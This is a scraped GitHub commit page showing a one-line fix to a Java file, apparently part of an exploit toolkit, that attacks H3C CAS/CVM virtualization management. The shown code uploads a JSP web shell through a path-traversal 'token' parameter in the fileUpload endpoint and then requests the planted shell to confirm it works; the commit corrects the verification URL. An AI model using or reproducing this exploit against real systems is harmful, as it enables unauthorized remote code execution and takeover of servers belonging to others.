We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents c8877e6 + ec1492c commit ee7412aCopy full SHA for ee7412a
src/main/java/exp/equipment/h3c/cas_cvm_upload.java
@@ -56,7 +56,7 @@ private boolean shell(String url,TextArea textArea){
56
57
Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.jsp&name=222", payload, head, "utf-8");
58
59
- Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+ Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
60
if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
61
Platform.runLater(() -> {
62
textArea.appendText(
0 commit comments